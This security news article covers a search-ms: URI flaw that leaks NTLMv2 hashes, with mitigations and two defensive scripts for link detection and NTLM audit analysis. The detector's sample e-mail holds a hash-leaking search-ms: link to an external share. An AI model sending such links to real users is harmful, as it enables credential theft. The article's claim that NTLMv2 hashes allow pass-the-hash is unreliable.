
Windows Search URI Handler Flaw Leaks NTLMv2 Hashes to Attacker-Controlled Servers
Critical Flaw: Windows Search URI Handler Leaks NTLMv2 Hashes Via Single Click
A silent and significant vulnerability has emerged within the Windows operating system, posing a substantial risk to sensitive credential data. A newly discovered flaw in the Windows Search URI handler can surreptitiously transmit NTLMv2 hashes to attacker-controlled servers. This occurs with nothing more than a user clicking a specially crafted link, bypassing traditional security prompts and leaving organizations exposed to credential theft and lateral movement.
This behavior mirrors an earlier identified bug class, CVE-2023-33829, which affected the Snipping Tool. However, for this Windows Search variant, Microsoft has yet to assign a CVE identifier or provide a patch, leaving a critical window of exposure for countless systems globally.
Understanding NTLMv2 Hashes and Their Risk
NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provide authentication, integrity, and confidentiality to users. While NTLMv2 is an improvement over its predecessors, offering enhanced security, an NTLMv2 hash itself is not a user’s password. Instead, it’s a cryptographic representation derived from the password. However, these hashes are highly valuable to attackers.
Attackers can use captured NTLMv2 hashes in several ways:
- Pass-the-Hash (PtH) Attacks: By simply possessing the hash, an attacker can authenticate to other systems on the network without ever needing to crack the actual password. This is a common technique for lateral movement within an enterprise.
- Offline Brute-Forcing: Although more computationally intensive than using the hash directly, an attacker can brute-force a captured NTLMv2 hash offline and eventually recover the plain-text password; a complex password slows this down but does not rule it out.
- Relay Attacks: NTLMv2 hashes can be relayed to other services that accept NTLM authentication, allowing attackers to impersonate the compromised user.
The Mechanism of the Windows Search URI Handler Flaw
The core of this vulnerability lies in how Windows handles specific Uniform Resource Identifier (URI) schemes. URIs like search-ms: are designed to launch the Windows Search application with predefined parameters. Attackers can craft a malicious link or embed such a URI within a document (e.g., a Word document, a web page, or an email). When a user clicks this link, Windows attempts to process the URI.
Within this malicious URI, a crafted parameter can direct Windows Search to attempt to load external content or resources from an attacker-controlled SMB (Server Message Block) share. During this connection attempt, the Windows operating system, by default, will automatically try to authenticate to the SMB share using the user’s NTLMv2 hash. Crucially, this happens without any explicit user prompts or warnings, making it an extremely stealthy method of credential harvesting.
This process is highly effective because:
- It leverages a legitimate Windows function.
- It requires minimal user interaction (a single click).
- It bypasses conventional security measures that might block executable downloads or malicious scripts.
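The point above, that a search-ms: URI can carry a UNC path that makes Windows open an SMB connection, can be turned into a mail-gateway or document-scanning check. The following is an added example written for this page (not code from the original article or from Microsoft); the internal-domain allowlist and the sample e-mail body are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed allowlist for this example: name suffixes of the organisation's own file servers.
INTERNAL_SUFFIXES = (".corp.example",)

# A search-ms: URI runs until whitespace or a delimiter that closes a link in HTML/markup.
SEARCH_MS_RE = re.compile(r"search-ms:[^\s\"'<>)]+", re.IGNORECASE)
# UNC path \\host\share; applied after percent-decoding so %5C%5C encodings are caught too.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\([^\\&\s]+)")


def is_external_host(host: str) -> bool:
    """True unless the host is a private/loopback IP, a bare intranet name, or an allowlisted domain."""
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:
        pass  # not an IP literal, evaluate it as a DNS name
    name = host.lower()
    return "." in name and not name.endswith(INTERNAL_SUFFIXES)


def find_unc_targets(text: str) -> list[dict]:
    """Extract every search-ms: URI in text and the UNC share(s) its parameters reference."""
    findings = []
    for match in SEARCH_MS_RE.finditer(text):
        uri = match.group(0)
        for host, share in UNC_RE.findall(unquote(uri)):
            findings.append({"uri": uri, "host": host, "share": share,
                             "external": is_external_host(host)})
    return findings


def suspicious_uris(text: str) -> list[str]:
    """URIs that would make the Windows Search handler open an SMB connection to an external host."""
    return [f["uri"] for f in find_unc_targets(text) if f["external"]]


# Constructed sample: an e-mail body with one external and one intranet search-ms: link.
SAMPLE_EMAIL = (
    "Open the report here: "
    "search-ms:displayname=Quarterly%20Report&crumb=location:%5C%5Cexternal.example.net%5Cshare\n"
    "Intranet search: search-ms:query=budget&crumb=location:\\\\fileserver.corp.example\\finance"
)

if __name__ == "__main__":
    for f in find_unc_targets(SAMPLE_EMAIL):
        print(("EXTERNAL " if f["external"] else "internal ") + f["host"] + " -> " + f["uri"])
```

Note that Python's ipaddress module treats the RFC 5737 documentation ranges as non-global, so test the IP branch with genuinely public addresses in a real deployment.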
Comparison to CVE-2023-33829 (Snipping Tool)
The described flaw is not entirely new in concept. It bears a striking resemblance to CVE-2023-33829, a vulnerability discovered in the Windows Snipping Tool. In that instance, a crafted link could cause the Snipping Tool to make network requests that leaked NTLMv2 hashes. Microsoft addressed CVE-2023-33829 with a security update. However, the current Windows Search URI handler flaw represents a similar attack vector, yet it remains unpatched and without an assigned CVE, indicating a lack of official recognition or a delay in remediation from Microsoft.
Remediation Actions and Mitigation Strategies
Given the absence of an official patch, organizations and users must adopt proactive mitigation strategies to protect against this NTLMv2 hash leakage vulnerability:
- Block Outbound SMB Connections (Port 445): The most effective technical mitigation is to restrict outbound connections on TCP port 445 (SMB) from client machines to the internet. This prevents workstations from initiating SMB communication with external, potentially malicious, servers. Implement this at the perimeter firewall.
- Implement NTLM Block Policy: Group Policy can be used to restrict NTLM authentication, particularly for outbound connections. While this can have compatibility implications with legacy systems, it significantly reduces the attack surface.
- Educate Users on Phishing and Malicious Links: User awareness training remains a cornerstone of cybersecurity. Emphasize the dangers of clicking unknown links, even if they appear benign or come from trusted sources. Attackers often embed these links in phishing emails or malicious websites.
- Monitor NTLM Authentication Attempts: Implement robust logging and monitoring for NTLM authentication events, especially those originating from client machines attempting to connect to external servers or unusual internal destinations. Unusual NTLM traffic should trigger alerts.
- Enforce Least Privilege: Ensure users operate with the principle of least privilege. If an attacker captures a hash, the impact will be limited by the scope of the compromised user’s access.
- Disable URI Schemes (Advanced/Careful Implementation): In highly controlled environments, specific URI schemes that pose a risk could potentially be disabled via registry modifications. However, this requires careful testing as it can impact legitimate functionality.
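The monitoring item above (flag client machines that attempt NTLM authentication to external servers) can be implemented over exported NTLM audit events. The following is an added example written for this page, not code from the article; the CSV column names, the internal-domain allowlist, the approved-server list and the event rows are constructed assumptions, while event ID 8001 in the Microsoft-Windows-NTLM/Operational log is the real Windows audit event for outgoing NTLM authentication to remote servers.

```python
import csv
import io
import ipaddress
from collections import Counter

# Constructed allowlist: internal name suffixes and any external servers the organisation
# has deliberately approved for NTLM (the same idea as a remote-server exception list).
INTERNAL_SUFFIXES = (".corp.example",)
APPROVED_EXTERNAL = {"vpn-gateway.example.net"}


def is_external_host(host: str) -> bool:
    """True for public IPs and for DNS names outside the organisation's own suffixes."""
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:
        pass  # not an IP literal, evaluate it as a DNS name
    name = host.lower()
    return "." in name and not name.endswith(INTERNAL_SUFFIXES)


def outbound_ntlm_alerts(export_text: str) -> list[dict]:
    """Rows where a client attempted outgoing NTLM authentication to an unapproved external server."""
    alerts = []
    for row in csv.DictReader(io.StringIO(export_text)):
        target = row["target_server"].strip().lower()
        if row["event_id"] == "8001" and target not in APPROVED_EXTERNAL and is_external_host(target):
            alerts.append(row)
    return alerts


def alerts_per_workstation(alerts: list[dict]) -> Counter:
    """Count of suspicious outbound NTLM attempts per client, for triage and alert thresholds."""
    return Counter(a["workstation"] for a in alerts)


# Constructed, simplified export of client-side NTLM audit events (event 8001 = outgoing
# NTLM authentication to a remote server). The column names are this example's own,
# not the Windows event schema.
SAMPLE_EXPORT = """\
time,workstation,event_id,user,target_server
2024-05-01T09:12:03Z,WS-0412,8001,CORP\\jdoe,fileserver.corp.example
2024-05-01T09:12:41Z,WS-0412,8001,CORP\\jdoe,share.external.example.net
2024-05-01T09:13:02Z,WS-0733,8001,CORP\\asmith,10.20.30.40
2024-05-01T09:14:55Z,WS-0733,8001,CORP\\asmith,vpn-gateway.example.net
2024-05-01T09:15:17Z,WS-0733,8001,CORP\\asmith,docs.external.example.org
"""

if __name__ == "__main__":
    found = outbound_ntlm_alerts(SAMPLE_EXPORT)
    for a in found:
        print(f"{a['time']} {a['workstation']} {a['user']} -> {a['target_server']}")
    print(dict(alerts_per_workstation(found)))
```

Enabling the audit events themselves is done through the "Network security: Restrict NTLM: Audit outgoing NTLM traffic" policy mentioned in the Group Policy item above; the script only consumes what that audit produces.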
Relevant Tools for Detection and Mitigation
| Tool Name | Purpose | Link |
|---|---|---|
| Wireshark | Network protocol analyzer to detect outbound SMB connections and NTLM negotiation. | https://www.wireshark.org/ |
| Group Policy Management Editor | Configure and deploy NTLM policies, firewall rules (e.g., blocking outbound port 445). | (Standard Windows component) |
| Microsoft Defender for Endpoint / EDR Solutions | Detect suspicious outbound network connections and malicious activity related to URI handler exploitation. | https://www.microsoft.com/en-us/security/business/microsoft-defender-for-endpoint |
| Firewall (e.g., Palo Alto, Fortinet, pfSense) | Enforce network segmentation and block outbound SMB (port 445) at the perimeter. | (Vendor specific) |
Conclusion: Immediate Vigilance Required
The Windows Search URI handler flaw represents a potent threat, leveraging a single click to expose sensitive NTLMv2 hashes. The absence of an official CVE and a patch from Microsoft necessitates immediate and proactive defensive measures. Organizations must prioritize blocking outbound SMB traffic, enhancing user awareness, and implementing robust monitoring for NTLM authentication to safeguard against credential theft and the subsequent risks of lateral movement and broader system compromise. Remaining vigilant and implementing the recommended mitigations is paramount in protecting enterprise environments from this silent, yet critical, vulnerability.


